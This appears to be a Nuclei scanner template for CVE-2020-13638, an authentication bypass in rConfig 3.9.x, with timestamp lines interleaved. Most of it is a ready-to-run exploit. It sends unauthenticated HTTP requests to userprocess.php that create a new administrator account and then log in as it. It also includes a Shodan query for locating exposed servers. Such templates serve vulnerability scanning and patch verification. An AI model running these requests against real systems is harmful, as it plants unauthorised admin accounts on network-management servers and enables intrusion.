2023-10-17 07:20:28 +00:00
id : CVE-2020-13638
info :
name : rConfig 3.9 - Authentication Bypass(Admin Login)
author : theamanrawat
severity : critical
description : |
lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.
reference :
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13638
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2020-13638
2023-10-17 17:52:26 +00:00
cwe-id : CWE-269
2024-01-14 13:49:27 +00:00
epss-score : 0.36738
epss-percentile : 0.96806
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 3
vendor : rconfig
product : rconfig
2023-10-17 07:20:28 +00:00
shodan-query : http.title:"rConfig"
2023-10-17 17:52:26 +00:00
tags : cve,cve2020,rconfig,auth-bypass,intrusive
2023-10-17 07:20:28 +00:00
variables :
username : "{{to_lower(rand_text_alpha(5))}}"
password : "{{rand_text_alphanumeric(12)}}!"
email : "{{rand_base(8)}}@{{rand_base(5)}}.com"
http :
- raw :
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="username"
{{username}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="passconf"
{{password}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="password"
{{password}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="email"
{{email}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="editid"
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="add"
add
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="ulevelid"
9
--01b28e152ee044338224bf647275f8eb--
- |
GET /login.php HTTP/1.1
Host : {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
host-redirects : true
2023-10-17 17:52:26 +00:00
2023-10-17 07:20:28 +00:00
matchers-condition : and
matchers :
- type : word
part : body_3
words :
- "rConfig - Configuration Management"
- "Logged in as"
- "dashboadFieldSet"
condition : and
- type : word
part : header_3
words :
- 'text/html'
- type : status
status :
- 200
2023-12-12 12:02:03 +00:00
# digest: 4a0a0047304502200126f5bae50f9946dd01eefc3233d9e6051abcf801909698679d337b6c1041f9022100ca15774f0605cee90a602ccecbb344bbedda5c293d0ea03e5a604530c2be780a:922c64590222798bb761d5b6d8e72950